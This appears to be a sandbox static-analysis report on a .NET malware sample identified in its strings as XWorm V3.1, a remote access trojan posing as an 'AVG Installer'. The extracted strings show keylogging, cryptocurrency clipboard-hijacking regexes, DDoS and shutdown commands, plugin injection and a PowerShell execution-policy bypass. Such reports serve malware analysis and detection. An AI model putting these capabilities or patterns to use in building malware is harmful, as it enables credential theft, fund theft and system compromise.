Static | ZeroBOX

PE Compile Time

2023-03-08 13:51:44

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x000149c4 | 0x00014a00 | 5.89916803855 |
| .rsrc | 0x00018000 | 0x000005c8 | 0x00000600 | 4.17490326484 |
| .reloc | 0x0001a000 | 0x0000000c | 0x00000200 | 0.101910425663 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x000180a0 | 0x0000033c | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x000183dc | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Z?_d
_b`*
v4.0.30319
#Strings
AssemblyTrademarkAttribute
System.Reflection
mscorlib
System
String
AssemblyFileVersionAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
GuidAttribute
System.Runtime.InteropServices
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTitleAttribute
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
Boolean
RuntimeCompatibilityAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
AssemblyConfigurationAttribute
AssemblyDelaySignAttribute
AssemblyKeyFileAttribute
AssemblyKeyNameAttribute
sssss.exe
<Module>
ApplicationBase
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic
Computer
Microsoft.VisualBasic.Devices
Object
_Closure$__1
MulticastDelegate
_Closure$__2
_Closure$__3
System.Windows.Forms
ValueType
VB$AnonymousDelegate_0
<Module>{9AAEEFF3-E2BE-4BFE-9ABD-C7B7FC82F7C0}
ILLicenseModule
Attribute
<PrivateImplementationDetails>{3867D8E3-FAC5-46B4-A900-377BEB902C1F}
__StaticArrayInitTypeSize=256
__StaticArrayInitTypeSize=32
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=18
.cctor
get_Computer
get_GetInstance
get_Application
get_User
get_WebServices
Application
WebServices
Equals
RuntimeHelpers
GetObjectValue
GetHashCode
GetType
GetTypeFromHandle
RuntimeTypeHandle
ToString
Create__Instance__
instance
Activator
CreateInstance
Dispose__Instance__
GetInstance
Interaction
Environ
Concat
Thread
System.Threading
Exception
ThreadStart
IntPtr
Conversions
Microsoft.VisualBasic.CompilerServices
ProjectData
SetProjectError
Environment
ClearProjectError
_Lambda$__1
_Lambda$__2
_Lambda$__3
_Lambda$__4
Random
WaitHandle
WaitOne
Socket
System.Net.Sockets
MemoryStream
System.IO
ManualResetEvent
BeginConnect
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
ToInteger
Connect
AsyncCallback
BeginReceive
IAsyncResult
SocketFlags
EventWaitHandle
ComputerInfo
get_UserName
get_OSFullName
Replace
get_OSVersion
OperatingSystem
get_ServicePack
get_Is64BitOperatingSystem
INDATE
FileInfo
DateTime
FileSystemInfo
get_LastWriteTime
Spread
GetFileName
Operators
CompareString
WindowsIdentity
System.Security.Principal
GetCurrent
WindowsPrincipal
IsInRole
WindowsBuiltInRole
Antivirus
ManagementObjectSearcher
System.Management
StringBuilder
System.Text
ManagementBaseObject
ManagementObjectEnumerator
ManagementObjectCollection
get_MachineName
GetEnumerator
Append
get_Current
get_Item
MoveNext
IDisposable
Dispose
get_Length
Substring
EndReceive
ToArray
ToLong
Stream
WriteByte
WaitCallback
ThreadPool
QueueUserWorkItem
BeginRead
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
EndSend
isDisconnected
Collect
_Lambda$__5
_Lambda$__6
WebClient
System.Net
Graphics
System.Drawing
Rectangle
Bitmap
Strings
CompareMethod
Restart
Shutdown
SocketShutdown
GetTempPath
Combine
DownloadFile
Process
System.Diagnostics
AppWinStyle
ParameterizedThreadStart
AddObject
ConcatenateObject
ReadAllText
Screen
get_PrimaryScreen
get_Bounds
get_Width
get_Height
PixelFormat
System.Drawing.Imaging
FromImage
CopyFromScreen
CopyPixelOperation
DrawImage
GraphicsUnit
ImageFormat
get_Jpeg
MessageBox
DialogResult
get_Message
Plugin
MethodInfo
AppDomain
get_CurrentDomain
Assembly
GetTypes
GetMethods
NewLateBinding
LateGet
ConditionalCompareObjectEqual
Exists
LateCall
Convert
ToInt32
ToBoolean
MemberInfo
get_Name
StartsWith
SendMSG
SendError
Stopwatch
TimeSpan
get_Elapsed
op_GreaterThan
FromSeconds
Double
Monitoring
List`1
System.Collections.Generic
GetProcesses
get_MainWindowTitle
IsNullOrEmpty
ToLower
Contains
Func`2
Enumerable
System.Linq
System.Core
IEnumerable`1
OpenUrl
Hidden
HttpWebRequest
HttpWebResponse
ServicePointManager
set_Expect100Continue
set_SecurityProtocol
SecurityProtocolType
set_DefaultConnectionLimit
WebRequest
Create
set_UserAgent
set_AllowAutoRedirect
set_Timeout
set_Method
GetResponse
WebResponse
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
avicap32.dll
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
RunDisk
Extension
ProcessStartInfo
WriteAllBytes
EndsWith
set_WindowStyle
ProcessWindowStyle
set_Arguments
Memory
buffer
get_EntryPoint
MethodBase
GetParameters
ParameterInfo
Invoke
_Lambda$__7
_Lambda$__8
$VB$Local_Host
$VB$Local_Port
_Lambda$__9
Encoding
get_UTF8
GetBytes
IsUpdate
StreamWriter
GetTempFileName
TextWriter
WriteLine
get_StartupPath
get_ExecutablePath
set_FileName
set_CreateNoWindow
set_ErrorDialog
set_UseShellExecute
SetHook
GetCurrentProcess
get_ProcessName
HookCallback
wParam
lParam
get_NewLine
ToUInteger
UInt32
op_Explicit
op_Equality
Marshal
ReadInt32
KeyboardLayout
vkCode
GetActiveWindowTitle
GetProcessById
IsNullOrWhiteSpace
SetWindowsHookEx
idHook
dwThreadId
user32.dll
UnhookWindowsHookEx
CallNextHookEx
GetModuleHandle
lpModuleName
kernel32.dll
GetForegroundWindow
GetWindowThreadProcessId
lpdwProcessId
GetKeyState
keyCode
GetKeyboardState
lpKeyState
GetKeyboardLayout
idThread
ToUnicodeEx
wVirtKey
wScanCode
pwszBuff
cchBuff
wFlags
MapVirtualKey
uMapType
TargetObject
TargetMethod
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
System.Text.RegularExpressions
AddClipboardFormatListener
SetParent
hWndChild
hWndNewParent
GetText
SetApartmentState
ApartmentState
SetText
$VB$Local_ReturnValue
_Lambda$__10
Clipboard
$VB$Local_txt
_Lambda$__11
Control
get_Handle
RegexResult
pattern
get_Success
WndProc
Message
get_Msg
get_CreateParams
CreateParams
OrObject
LateSet
Decrypt
RijndaelManaged
System.Security.Cryptography
ICryptoTransform
MD5CryptoServiceProvider
SymmetricAlgorithm
set_Mode
CipherMode
CreateDecryptor
FromBase64String
TransformFinalBlock
HashAlgorithm
ComputeHash
set_Key
UTF8SB
UTF8BS
GetString
get_MainModule
ProcessModule
get_FileName
GetRandomString
length
get_Chars
GetLastInputInfo
GetLastInputTime
get_TickCount
SizeOf
LastAct
GetWindowText
SetThreadExecutionState
esFlags
PreventSleep
get_Default
get_ProcessorCount
get_SystemDirectory
GetPathRoot
DriveInfo
get_TotalSize
GetHashT
strToHash
get_ASCII
ToUpper
SetValue
RegistryKey
Microsoft.Win32
Registry
CurrentUser
CreateSubKey
RegistryKeyPermissionCheck
RegistryValueKind
GetValue
Decompress
ChangeType
BitConverter
GZipStream
System.IO.Compression
CompressionMode
SubtractObject
Compress
AES_Encryptor
CreateEncryptor
AES_Decryptor
CreateMutex
CloseMutex
value__
InitializeArray
RuntimeFieldHandle
leHifFIJCLsZtKEFfM1i
lA8byixHs
UInt64
npynP5ID7
UInt16
frGPLkUmg
B9QMQESRS
gW8I6urYX
efQiYYe9B
tOK6QO3G3
CATjlB2Pr
get_Assembly
GetMethod
BindingFlags
Fu0hXoi7j
AesCryptoServiceProvider
LsLeWNAEm
w2UAjPN2t
bXvlVOsQS
get_Unicode
RENgxJgNd
VirtualProtect
bcLJCVPb6
BinaryReader
get_BaseStream
get_Position
ToInt64
WriteInt32
GetManifestResourceStream
get_Size
get_Id
set_Position
Reverse
GetModules
Module
GetHINSTANCE
GetName
AssemblyName
GetPublicKeyToken
ReadBytes
aBHX1nnyl
get_Location
get_CodeBase
GetProperty
PropertyInfo
kMiVtdYDP
WriteProcessMemory
bidqXN0uo
ReadProcessMemory
SfCBK85Ng
OpenProcess
eLtxCBuln
CloseHandle
VImrySTt0
FileStream
FileMode
FileAccess
FileShare
uAjmKLvd2
CryptoStream
set_IV
CryptoStreamMode
BjndDjDik
I22aEXt06
ht400wywm
S2DfD7ndw
sX0QQqvSd
f8vGGAr2L
yEl2DlTrk
ReZSeFrDE
a1wUeQYNk
OZEYuqcRi
FjO71BLE1
Xjmyl8i2L
R7ZKDdJj0
ToBase64String
SLV0fFIsptsZtjvFft17
lE0n2FGDnMFJ4SGV2D
get_ApplyToMembers
set_ApplyToMembers
get_Exclude
set_Exclude
get_Feature
set_Feature
get_StripAfterObfuscation
set_StripAfterObfuscation
ApplyToMembers
Exclude
Feature
StripAfterObfuscation
$$method0x6000002-1
$$method0x600001c-1
$$method0x600001c-2
$$method0x600002a-1
$$method0x60000a2-1
Dictionary`2
$$method0x6000208-1
sssss.g.resources
03d472d7-25c0-4718-81de-c205aa01baf1
GeneratedCodeAttribute
System.CodeDom.Compiler
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
DebuggerHiddenAttribute
HideModuleNameAttribute
StandardModuleAttribute
HelpKeywordAttribute
System.ComponentModel.Design
MyGroupCollectionAttribute
ComVisibleAttribute
CompilerGeneratedAttribute
ThreadStaticAttribute
STAThreadAttribute
DebuggerStepThroughAttribute
DebuggerDisplayAttribute
FlagsAttribute
AttributeUsageAttribute
AttributeTargets
2.1.92.0
AVG Technologies CZ, s.r.o.
$d4a785c4-ac5b-43ac-ac6f-547e9cc90a37
.Copyright (C) 2023 AVG Technologies CZ, s.r.o.
AVG Installer
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
`1[[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]][]
AllowMultiple
Inherited
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
$(D%]pW
vDar>y
Asn:e1
9K#p)-
f"(e!Jx}
IR&iTK
/^e;Z'X]
Y5H{0j%
DBRfhn M
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
.;w.3nC
$#%#&#'#
\Log.tmp
BtOMMOKwdDwAnFk2CkqVWpu1RLhiDbD/EUsevZCecz3yRgz2v7anXH+v7eieanMl
Na4A/A3nCdwYodlgb8PTGa+ok7z3j/UTXHFUxTBoF4a5A4Ur/yXtuCK7Aw/wLQHS
RMhLK/OPOD2BhWsFShGpxgaPKugrwlNYRssVhz6dITwdKVcHlaQhQuXuzehgPA+R
prm15cJXncKmjac47aHAmA==
A2vXrjTo3SRo0CuOifuHJw==
qnHEPIgMHs/dPMCMgzBbKj+Q1iV2TYINOOe1LpIrICc=
Otu6jLKlPOiVYjEK+SKmkQ==
GxATa6g51MsEXZHXcfH+uA==
tijUovXsHb2Gfdky
Microsoft
Service Pack
XWorm V3.1
dd/MM/yyy
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
uninstall
update
Urlopen
Urlhide
PCShutdown
shutdown.exe /f /s /t 0
PCRestart
shutdown.exe /f /r /t 0
PCLogoff
shutdown.exe -L
StartDDos
StopDDos
StartReport
StopReport
plugin
sendPlugin
savePlugin
OfflineGet
MessageBox
Invoke
injRun
UACFunc
ngrok+
Plugin
RunRecovery
Recovery
RunOptions
Plugin Error!
Open [
ToLower
powershell.exe
-ExecutionPolicy Bypass -File "
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
@echo off
timeout 3 > NUL
" /f /q
[SPACE]
Return
[ENTER]
Escape
LControlKey
[CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
[Back]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
ToUpper
MainWindowTitle
ProcessName
\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\b
T[A-Za-z1-9]{33}
\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\b
TRC20 Clipper
BTC Clipper
ETH Clipper
ExStyle
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Software\
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
abcdefghijklmnopqrstuvwxyz
Err HWID
ToArray
System.Security.Cryptography.CryptoConfig
get_AllowOnlyFipsAlgorithms
{11111-22222-10009-11111}
{11111-22222-50001-00000}
03d472d7-25c0-4718-81de-c205aa01baf1
file:///
Location
{11111-22222-10001-00001}
{11111-22222-10001-00002}
{11111-22222-20001-00001}
{11111-22222-20001-00002}
{11111-22222-40001-00001}
{11111-22222-40001-00002}
{11111-22222-50001-00001}
{11111-22222-50001-00002}
{11111-22222-60001-00001}
{11111-22222-60001-00002}
This assembly is protected by an unregistered version of "IntelliLock"!
www.eziriz.com
<script language='javascript'>alert( "This assembly is protected by an unregistered version of IntelliLock!" );</script>
abcdefghijklmnopqrstuvwxyz
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
CompanyName
AVG Technologies CZ, s.r.o.
FileDescription
AVG Installer
FileVersion
2.1.92.0
InternalName
sssss.exe
LegalCopyright
Copyright (C) 2023 AVG Technologies CZ, s.r.o.
OriginalFilename
sssss.exe
ProductName
ProductVersion
2.1.92.0
Assembly Version
2.1.92.0
No antivirus signatures available.
No IRMA results available.